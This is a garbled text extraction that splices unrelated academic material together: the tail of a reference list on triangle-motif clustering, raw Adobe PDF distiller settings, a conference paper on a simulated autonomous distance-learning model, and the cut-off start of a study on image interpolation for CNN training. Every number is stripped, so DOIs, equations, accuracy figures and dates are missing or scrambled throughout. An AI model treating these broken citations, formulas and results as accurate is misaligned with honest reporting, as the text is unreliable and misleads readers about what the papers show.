comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://snap.stanford.edu/data http://dx.doi.org/ . / . . http://dx.doi.org/ . / - / / http://dx.doi.org/ . /infocom. . http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /dsw. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /mwc. . http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ning z, wang x, rodrigues j, xia f. b. joint computation offloading, power allocation, and channel assignment for g-enabled traffic management systems. ieee transactions on industrial informatics doi . /tii. . . ning z, xia f, ullah n, kong x, hu x. . vehicular social networks: enabling smart mobility. ieee communications magazine ( ): – doi . /mcom. . s. pizzuti c. . a multiobjective genetic algorithm to find communities in complex networks. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . reyes-gonzalez l, gonzalez-brambila cn, veloso f. . using co-authorship and citation analysis to identify research groups: a new way to assess performance. scientometrics ( ): – doi . /s - - - . ribeiro p, silva f, kaiser m. . strategies for network motifs discovery. in: e-science, . e-science’ . fifth ieee international conference. piscataway: ieee, – . rozemberczki b, davies r, sarkar r, sutton c. . gemsec: graph embedding with self clustering. available at http://arxiv.org/abs/ . . schaeffer se. . graph clustering. computer science review ( ): – doi . /j.cosrev. . . . shervashidze n, vishwanathan s, petri t, mehlhorn k, borgwardt k. . efficient graphlet kernels for large graph comparison. in: artificial intelligence and statistics, clearwater beach, florida, usa, – . shi c, li y, zhang j, sun y, philip sy. . a survey of heterogeneous information network analysis. ieee transactions on knowledge and data engineering ( ): – . stoer m, wagner f. . a simple min-cut algorithm. journal of the acm ( ): – doi . / . . wang x, ning z, hu x, ngai ec-h, wang l, hu b, kwok ryk. a. a city-wide real-time traffic management system: enabling crowdsensing in social internet of vehicles. ieee communications magazine ( ): – doi . /mcom. . . wang x, ning z, zhou m, hu x, wang l, zhang y, richard yu f, hu b. b. privacy- preserving content dissemination for vehicular social networks: challenges and solutions. ieee communications surveys & tutorials doi . /comst. . . wang x, ning z, hu x, wang l, hu b, cheng j, leung vcm. . optimizing content dissemination for real-time traffic management in large-scale internet of vehicle systems. ieee transactions on vehicular technology ( ): – doi . /tvt. . . wegner ae. . subgraph covers: an information-theoretic approach to motif analysis in networks. physical review x ( ): doi . /physrevx. . . xia f, wang w, bekele tm, liu h. . big scholarly data: a survey. ieee transactions on big data ( ): – doi . /tbdata. . . yan x, han j. . gspan: graph-based substructure pattern mining. in: data mining, . icdm . proceedings ieee international conference. maebashi: ieee, – . yin h, benson ar, leskovec j, gleich df. . local higher-order graph clustering. proceedings of the rd acm sigkdd international conference on knowledge discovery and data mining. acm, – . zhou d, huang j, schölkopf b. . learning with hypergraphs: clustering, classification, and embedding. in: international conference on neural information processing systems, canada, vol. , – . feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /mcom. . s http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ . http://dx.doi.org/ . /j.cosrev. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /physrevx. . http://dx.doi.org/ . /tbdata. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comics: a community property-based triangle motif clustering scheme introduction related work experiments results and discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international conference on sensor network and computer engineering (icsnce ) advanced dynamic autonomous knowledge learning method for distance learning yanfang fu school of computer science and engineering, xi`an technological university xi’an, , china e-mail: @qq.com xing li school of computer science and engineering, xi`an technological university xi’an, , china e-mail: @qq.com xueyao feng school of computer science and engineering, xi`an technological university xi’an, , china e-mail: @qq.com jing ma school of computer science and engineering, xi`an technological university xi’an, , china e-mail: @qq.com abstract—as the manufacturing of vast amount of information transmits at an unprecedented rate, traditional learning is no way to meet the needs of open learning and lifelong learning, how can distance learning be used to help us study become a problem to think about .distance learning requires improvement of interactivity and initiative to achieve their aptitude. using a variety of formats data, learners master the initiative in the learning process, it is not easy to lead to deviation from the learning goals phenomenon. to this end, in order to solve this problem, we use the basis of iltmk theory and distributed interactive technology to introduce the active learning factors and propose a dynamic autonomous knowledge learning model and build its model’s simulation running environment and related mechanism. through simulation experiment, we can verify the effectiveness of the autonomous learning methods. keywords-distance learning; iltmk theory; distributed interactive technology; dynamic autonomous knowledge learning model i. introduction looking at the source of knowledge view, knowledge is that the knower grasps the essence of things through the phenomenon. so, bystanders knowledge view derived from the ancient greek natural philosopher, which hold by socrates and others, lead to the “acceptance learning” long period domination of human way of learning[ - ]. in china, participant knowledge view of basic education reform is ' inquiry learning'. the history of education practice shows, only participant knowledge view instead of bystander knowledge view, inquiry learning may be instead of reception learning. knowledge contains a personal factor. knowledge acquisition process is the learners to participate in the process of knowledge construction. jone deway would explain that participant knowledge view is interaction of the human and the environment [ ]. inquiry learning not only focuses on participant personal experiences process, more emphasis on personal understanding [ ]. with the popularity of internet, distance learning has gone from a letter-based, based on broadcast television systems "receiving learning" toward network-based (baidu library and blackboard) "research study" direction. distance learning is a complement to a new independent study model. now some intelligent distance learning increases chat rooms, electronic whiteboard and virtual classroom, and other functions to improve the learning effect, but it is only to international conference on sensor network and computer engineering (icsnce ) provide support in the learning environment, did not achieve the custom teaching mode of learner’s active learning. existing model commonly used model based on agent technology or iltmk (intelligent long-distance teaching model based on knowledge)[ ].however, at present, most distance learning model is a simple information-sharing individual learning styles. just solved how to make use of the internet technology, makes the geographical separation of some groups can share learning materials, learners are always in a passive learning mode. so far no one is satisfied with the distance learning model [ ]. if the learners can interact with active learning, distance learning can produce good learning results. as information technology, especially with the rapid development of network technology and communication technology, distance learning and creates a rapidly improve our knowledge [ ]. how to establish interactive mode between the learner and knowledge grantee, plays an important role in research and innovation. ii. relevant theories of the distance learning to make full use of the knowledge resources on the network, we must adopt a deeper sharing strategy that absorbed in the knowledge sharing or knowledge unit sharing[ ]. a knowledge unit or learning entity is relatively independent, and it stands for one element of the knowledge unit, knowledge can be hierarchical and nested, and itself is an independent description metadata. lo can be divided into two parts, namely the metadata and content data. metadata section describes the characteristics of the lo, content data part gives the knowledge that represented by lo and the information. in order to realize the intelligent reasoning of the system, we use the production system to represent knowledge and information [ ]. the reason why we choose this knowledge representation is that it has many advantages, especially its easy understanding, availabilities and manageability. meanwhile, today’s most intelligent application adopted this kind of knowledge representation. production system contains a set of production(or production rules) and facts, production rules use ifthen to show the knowledge, “attribute/ value” pairs are used to means the facts. production rules has the following form: if (<conditon ><condition ><condition ><condition n>) then (<conclusion ><conclusion ><conclusio >---<conclusion n>) when satisfy the application condition, the data will be operated by the order which the conclusion talks. the form of the lo in the production can be constants, variables, unit groups or tree, figure. iii. learning model baesd on interactoin a. characteristics of active distance-learning model design remote active learning model should have the following characteristic elements. ( )boundary and exclusivity, which means personnel composition in a learning subject is clear, whether to learn the subject or not needs to be identified;( )the purpose, learning subject exists as a certain purpose, also as the learning interaction that sharing some knowledge.( )rules, each member must abide by certain interactive code of conduct; ( )the obligations, in the process of learning, each knowledge sender bears certain teaching responsibility;( )independence, that is ,every member can make choice about their own rights and awareness. the concept of the “interaction” firstly appeared in communication and sociology, in sociology, the definition of the interaction is ways and processes of interactive influences, effects produced between humans and groups.“interactive” dynamically performed the person’s social relations, all kinds of complicated social phenomenon are caused by interaction. when thinking about interaction in the field of communication[ ], we find that the interaction’s is more likely to focus on the flow and exchange of study information, or relationship among transmission elements. simple “teaching” or “learning” in the distance learning is difficult to reach the expected goals, the entire learning international conference on sensor network and computer engineering (icsnce ) process should be placed in “relationship” and “interactive” so that it can be better achieved. therefore, interaction stands out of the virtual learning community. in the learning process, we call the interaction produced from learners interaction with others through internet or with their teachers the interactive spread[ ]. due to the nature of distance education, the teachers and students are often in different location ,and time and space are relatively separated in the whole education, therefore, purposeful and bilateral will be very obvious in the transmission of teaching , and interaction will be more important in teaching. not free interactive communication often makes it more difficult for learners to improve themselves. so we can analyze that the process of the knowledge learning can be partitioned into several periodic learning interactive topic. each topic still be divided into several learning content, send requests to knowledge giver, when satisfy the condition of subject and the synchronization time, knowledge giver can respectively receive the request signals of each learner and not confused. meanwhile, knowledge which knowledge giver send to multiple learners are sequentially arranged in a specific time to teach, each learner just needs to received it within the specified time so that they can distinguish their intellectual theme from confused knowledge learning process and receive it down. in distance learning network, it is impossible for knowledge giver to master all the knowledge, he still needs to learn from the other knowledge giver in the virtual network, when two or more knowledge giver send knowledge data with same subject at the same time, or send data to same knowledge learner, then the conflict happens, so we should schedule the time of knowledge interaction. b. autonomous learning measurement method we should give two definitions in facing with the knowledge interaction scheduling:  in the network, each learner exists at least one interactive subject in a scheduling cycle.  network learners cannot receive knowledge and send new knowledge at the same time, and learners can’t receive more than one of the knowledge interaction either. each learner is learners in certain knowledge subjects, however, sometimes they can be the knowledge giver, so it increases the complexity of the system modeling. therefore, the problem of scheduling knowledge interaction is to assigned knowledge content to learning object according to different subjects[ ]. according to the knowledge content’s interest, we can be divide into two groups, that’s learners and the grantors. assuming that the entire network of interest have a , a …an, and their knowledge content is divide into l , l …lm. we can see it as a graph g(v,e), of which the node v( , , and n) stands for knowledge interest, n is for the number of interest, and the edge of e is for the collection of the interactions. when node i and j can interact with each other, we can think that there exists a undirected edge ji e , between two nodes, and ee ji  , , then the node i, j is one jump neighbor same with the learners and the knowledge givers; if the node i , j cannot directly communicate with each other, it means that they don’t have the same content of the knowledge, then we need to find out the knowledge giver about this knowledge content, therefore ,only through an intermediate node k , can it do the communication interaction, that is ,there exist e and e, so the node i , j are two jumps neighbor node. it is an adjacency matrix. we can describe the network with an symmetric binary n n matrix, as: )... , ,(][][ njicgc nnij   (c ij = edgeshavenode else .j.i,.    ) another nn matrix: )... , ,(][)( njidgd nmij   (d ij = neighborjumpstwoisnode else .,..j i., ,     ) considering above two jumps node can realize the spatial reuse, it can finally obtain the optimal autonomous learning model. the network has a number of m of the knowledge content,we can use a m  n binary matrix t= nmmi t  ][ : international conference on sensor network and computer engineering (icsnce ) ilearnertocontentknowledge else mi t ....     interactive rate: numbertopicknowledge ilearnertonumbercontentknowledge i .. .....  = m t m m mi  the entire network’s interactive rate is:    n i i n  = mn    m m n i mi t by two limiting conditions, two learners can send the request of the knowledge data at the same time only on the condition that two learners are separated by more than two jumps, we summarized the above content as the following model: min m and max  limiting conditions: c :   m m mi t    ni ,  c :  ], [,],, [,, mmjinjittc mjmiij  c : ]), [,,,],, [,,(, mmikkjjinkjitctc mjjkmiik  the main idea of the interactive process is: interaction is that each learner interact with knowledge giver according to the fixed knowledge content point and the chronological order on condition that they have common learning subject. the learners active behavior allows them to get more study time. if there is no learning behavior to release the study time, then let the knowledge giver’s interaction have a free time, if other learners initiative is more active and don’t have the enough to study further, then he can dispute with free time and improve more. iv. build simulation model based on the opnet data packages in opnet consist of one or more fields, package format editor is used to define the package format, data packages in each fields has name, size(which length is bit), color, type and default values. using graphical way, it can directly display the package’s each fields, the size of the fields can exactly reflect the bit length in package. we designed three different types of data packages as three different types of the data grouping, that is:knowledge content data grouping, active application grouping and knowledge givers’s reply grouping. figure . learners process model this process mainly includes the following states( fig. ), each state’s function is introduced as follows:  init state: this state is mainly realized the initialization of the simulation data, initial object mainly includes: active interaction time slice, interactive time, number of the knowledge subject, number of the knowledge content etc. after completing the initialization of an object, call the interrupt function op_intrpt_schedule_self (op_sim_time (), ), it will lead to process’s state transformation from producing interruption at the current time to the request state only to do the intern’s judgment.  idle state: free wait state, after all the state in performing the exit code should them return to this state, waiting for the right conditions for the next jump, in the exit code of this state will determine the current simulation’s interruption type, and assign to variable current_intrpt_type, then determine whether produce the current node’s interactive interruption or not, according to the type of the variable current_intrpt_type. if it is,then turned to the request or state tx to send the request package or data package.  fr_rx state: responsible for identifying the type of the data packages that from the network receiver. international conference on sensor network and computer engineering (icsnce ) extract the corresponding information in the field ack_data,judge whether current node’s interactive application is success or not, if yes, then extract the knowledge content’s information that contains in the ack_data field of the data packages, modify the if_need_request to , means application succeed. so there is no need to send the application grouping, then will cycle around in the state of idle, fr_rx, tx and fr_src_ , so the knowledge giver will send knowledge request in the assigned time slices until data queue is empty.  fr_src_ state: the condition that transform from idle state to this state is that source module in the nodes model generates a package, and has not yet been assigned the interactive time slice.  request state: the state of request is mainly responsible for calculating the current active application’s time slice position, determine whether to enter their own interaction time, if he entered into his interaction time , then fill in the fields of information, send secondary intellectual content after set up the fields information; if not into its time slice or the current time slice has exceeded its clock, then compute the next arrival time(absolute simulation time ), and set up a break at this time.  fr_src_ state: like the fr_src_ status’s function, fill in each field of the data package which receives from the data source, and insert it into the queue. the difference is that when the data source produces one package, only when the site’s application for time slice succeed, can state transform from idle to fr_src_ .  tx state: when the node’s application queue is not empty, sent data in this time slot. if the data grouping exists in the queue, you need to send the interaction request packet to the knowledge giver, apply for a number of time slice and use it to send data from a queue. process at this time in idle, fr_rx, fr_src_ and request jump between four states. after the success of the application, each frame of data within the time slot waiting for their own time slot to send data. this process will be idle, fr_rx, fr_src_ and tx , judge the time slice and send the data of internship for data to cycle until the system closed. v. simulation experiment the scale of the personnel simulation is about people (fig. ), the learners are set to the same request rate (intervalsetting function is negative expo-numberdistribution function),knowledge givers also bears for the same rate interact with learners. a learning subject forms one subnet, the learners interactwithknowledge giver to complete each content of the study, the learners may be as learners involved in the other subject learning subnet, a large number of this is nested. figure . modeling of simulated network level we can see from the diagram that knowledge giver under the theme interact with a large number of students, and the learners complete the knowledge content learning. from the figure , we can see that the improvement of the new model reflects the active learning behavior of learners. when the model adopting the dynamic autonomous learning, learners in sending interactive data clearly in dynamic changes (as shown in figure ). can be seen from the figure b, learners after receiving the grantor knowledge content, knowledge acquisition of related request change significantly, the interesting thing is the simulation data curve downward point is far lower than the original model of rate, this should be thatthe increase of the initiative will also reduce the interest in learning theme. international conference on sensor network and computer engineering (icsnce ) figure . learners average interactive rate (a)knowledge acquisition rate (b)knowledge acquisition request rate figure . learners sending interactive data in dynamic changes from the above two groups of simulation data, we can see that the improvement of the new model not only reflects the active learning behavior of learners, but also increase the degree to which are not interested in learning content. vi. conclusion the modern distance learning is bestowed with knowledge individuals, related to personal participation and learning knower. the enthusiasm of the individual, personal exploration, personal opinions are indispensable part of the knowledge. knowledge itself is the intrinsic personal factors, the knowledge acquisition process is the knower individuals involved in the process of knowledge construction. dewey explains the participants knowledge view as "interaction" of the human and the environment. distance learning requires interactivity and initiative to improve, to achieve their aptitude, use now study in a variety of formats data, learners to master the initiative in the learning process, it is not easy to lead to deviation from the learning goals. to this end, on the basis of thlmt theory and distributed interactive technology, the introduction of active learning factors, put forward a kind of active learning rules of interaction, the interaction between learners and knowledge imparter is studied, under the condition of active learning, completely control rules generated by interactive knowledge subject data with method of study, established a model of autonomous learning. the model not only focus on learners "through" process, more emphasis on the learner in the experience, get personalized understanding in learning enthusiasm. this way of learning value is that learners in "facing the complex itself" keep some kind of "seek" uncertainty, in the process of "certainty for" construction "personal knowledge", in the process of "seeking" uncertainty "eagerly seeking knowledge", and will set up the learning process in the simulation software, in order to dynamically determine the distance learning program and related learning strategy, really improve the intelligent and personalized distance learning. acknowledgment this research was supported by the industrial research project of shaanxi science and technology department (nos. gy- ) and the educational reform fund of xi'an international conference on sensor network and computer engineering (icsnce ) technological university (nos. jgz , jgy , xagdyj ). references [ ] lee b, yoon j,and lee i,“learners’ acceptance of e-learning in south korea: theories and results,” computers & education. rd ed,vol. , ,pp. – . [ ] ahmed h m s. “hybrid e-learning acceptance model: learner perceptions,” decision sciences the journal of innovative education. th ed,vol. , ,pp. – . [ ] ikpeze c h,and boyd f b. “web-based inquiry learning: facilitating thoughtful literacy with webquests,” reading teacher. th ed,vol. , ,pp. – . [ ] maudsley g, williams e m i, and taylor d c m. “problem-based learning at the receiving end: a ‘mixed methods’ study of junior medical students’ perspectives,”advances in health sciences education. th ed,vol. , ,pp. - . [ ] yun l x, sheng z y, and li z s. “intelligent internet long-distance teaching model based on knowledge,”journal of hefei university of technology. ,pp. - . [ ] english t, harrison a l, and hart a l. “a distance learning model in a physical therapy curriculum,” journal of allied health. , pp. . [ ] jenkins j r p c g j m. “special education and the regular education initiative: basic assumptions,” exceptional children. th ed,vol. , ,pp. - . [ ] harjumaa m, and oinas-kukkonen h. “towardsdeeper understanding of persuasion in software and information systems,” international conference on advances in computer-human interaction. ieee computer society, , pp. - . [ ] gellman-danley b, and fetzner m j. “asking the really tough questions: policy issues for distance learning.”online journal of distance learning administration . ,pp. - [ ] qing p, yun x, and shou-hong w.“research and implementation of animation technology on distance teaching courseware,” application research of computers. st ed,vol. , ,pp. - . [ ] boyle t. “design principles for authoring dynamic reusable learning objects,” australian journal of educational technology. th ed,vol. , ,pp. -- . submitted july accepted october published november corresponding author daisuke hirahara, ffieldai@gmail.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hirahara et al. distributed under creative commons cc-by . open access effects of data count and image scaling on deep learning training daisuke hirahara , eichi takaya , taro takahara and takuya ueda department of ai research lab, harada academy, kagoshima, kagoshima, japan school of science for open and environmental systems, graduate school of science and technology, keio university, yokohama, kanagawa, japan department of biological engineering, school of engineering, tokai university, isehara, kanagawa, japan department of clinical imaging, graduate school of medicine, tohoku university, sendai, japan abstract background. deep learning using convolutional neural networks (cnn) has achieved significant results in various fields that use images. deep learning can automatically extract features from data, and cnn extracts image features by convolution processing. we assumed that increasing the image size using interpolation methods would result in an effective feature extraction. to investigate how interpolation methods change as the number of data increases, we examined and compared the effectiveness of data augmentation by inversion or rotation with image augmentation by interpolation when the image data for training were small. further, we clarified whether image augmentation by interpolation was useful for cnn training. to examine the usefulness of interpolation methods in medical images, we used a gender data set, which is a sex classification data set, on chest radiographs. for comparison of image enlargement using an interpolation method with data augmentation by inversion and rotation, we examined the results of two- and four-fold enlargement using a bilinear method. results. the average classification accuracy improved by expanding the image size using the interpolation method. the biggest improvement was noted when the number of training data was , and the average classification accuracy of the training model with the original data was . . however, upon increasing the image size by four times using the interpolation method, the average classification accuracy significantly improved to . . compared with the data augmentation by inversion and rotation, the model trained using the bilinear method showed an improvement in the average classification accuracy by . with training data and . with , training data. comparisons of the average classification accuracy of the chest x-ray images showed a stable and high-average classification accuracy using the interpolation method. conclusion. training the cnn by increasing the image size using the interpolation method is a useful method. in the future, we aim to conduct additional verifications using various medical images to further clarify the reason why image size is important. subjects artificial intelligence, data mining and machine learning, data science keywords image scaling, nearest, bilinear, hamming, bicubic, lanczos, medical image, deep learning, fashion-mnist, interpolation how to cite this article hirahara d, takaya e, takahara t, ueda t. . effects of data count and image scaling on deep learning train- ing. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ffieldai@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction a convolutional neural network (cnn) proposed by researchers at the university of toronto at the imagenet large scale visual recognition challenge (hijazi, kumar & rowen, ) had significant impact on society when it achieved an approximately % improvement in error rate compared to previous methods. this technological development has made image classification widely known for its effectiveness, and its applications in the medical field are rapidly advancing (zhou et al., ; kyono, gilbert & van der schaar, ; poplin et al., ), e.g., classification of computed tomography images and mammographs, along with the prediction of cardiovascular risk from retinal fundus photographs. by training a cnn using a large volume image data, identification can be achieved at high accuracy. however, in the medical field though, large volumes of image data are not always available. as a result, when the amount of training data is limited or only small images are available, cnns cannot be trained as designed; thus, they cannot be used to solve problems. generally, if the amount of data is limited when training a machine learning model for image identification, a data augmentation method is employed to mirror or rotate the available image data. various data augmentation methods have been proposed as of june . for example, mixup (zhang et al., ) performs augmentation by linearly complementing labels and data to create new data, augmix (hendrycks et al., ) realizes data augmentation by convexly joining multiple randomly sampled operations and their compositions without deviating from the original data while maintaining diversity, and random erasing data augmentation (zhong et al., ) masks random, partial rectangular areas of an image to generate training data. these methods are effective for image classification, object detection, and person identification tasks; however, they are less effective for medical images because new data are generated and mask processing is performed. this is due to the fact that if the medical image is randomly cropped or masked, the lesion is hidden and frequently disappears in the true image. images of the human body have structures that originally have a fixed position of existence. for example, the liver is always on the right side of the body, and the heart is always on the left side. therefore, even recent data augmentation methods (mixup, augmix, and random erasing data augmentation) with right-to-left inversion or rotation may not improve the robustness of analysis for the human body images. it’s worth noting that several studies are currently investigating high-accuracy identification with a small amount of data using various methods, e.g., transfer learning and multi-scale cnns (bakkouri & afdel, ; samanta et al., ). in these methods, data augmentation is performed by degrading the image with a fixed number of pixels or by degrading the high-resolution image. however, studies using medical images often require the use of only a portion of the image. this can happen when we use ct images in the study for the lymph node. although the original resolution of ct is enough ( × ), the data size around the lymph nodes can only be a few tens of pixels, thereby causing low resolution. in addition, when hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cnn structure. fh, input height, fw, input width, oh, output height, ow, output width, p, padding, s, stride; kernel size= , stride= , padding= , dropout= . . full-size doi: . /peerjcs. /fig- nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- anatomically small tissues are made into an object, an image cut out from a diagnostic image may be used. in such cases, only low-resolution image are available. thus, in this paper, we investigated the effectiveness of using low-resolution image data processed by a pixel interpolation method as training data. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- cnn is a convolution process extracting features that fit the convolution kernel. convolution kernel sizes of × and × are commonly used. if the image data input to the cnn is small, the necessary features may not be extracted. therefore, we increased the input image data size using the interpolation method. in this paper, we reveal the impact of different pixel interpolation methods on model training, such as training models on low-resolution image data or training models on medical images that are cropped for the necessary part of the image. materials & methods in this study, the fashion-mnist dataset (xiao, rasul & vollgraf, ) was used to verify improvements in average classification accuracy. the fashion-mnist dataset contains fashion images and is unbiased because all classes are equal. note that monochrome images are often used in image diagnosis, and this dataset has similar features. in addition, the image size in the dataset is × pixels. after examining the fashion-mnist dataset, we used the gender data set, which predicts gender from chest radiographs published in the minijsrt_database, as a medical hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- image dataset (shiraishi et al., ). the image size in this dataset is × pixels, and there are and images of men and women, respectively. moreover, python . was used as the programming language, pytorch (version . . ) was used as the deep learning framework, and google colaboratory was utilized for the environment. as a deep learning model, we created and trained the cnn model. the structure of the created cnn model is shown in fig. . herein, the mini-batch method was used to train the cnn model. the training parameters included the following: the batch_size was , epochs were , adam’s method was used for optimization, and mean square error was used for loss function. we used the rectified linear unit as the activation function. the number of channels must be determined arbitrarily, and the kernel size, stride, and padding were common to all convolutional layers. dropout was applicable to dense and dense . the image data interpolation method used as input to cnn was the image processing library for python pillow’s five pixel interpolation methods (nearest (lehmann, gonner & spitzer, ), bilinear (lehmann, gonner & spitzer, ), hamming (harris, ), bicubic (keys, ), and 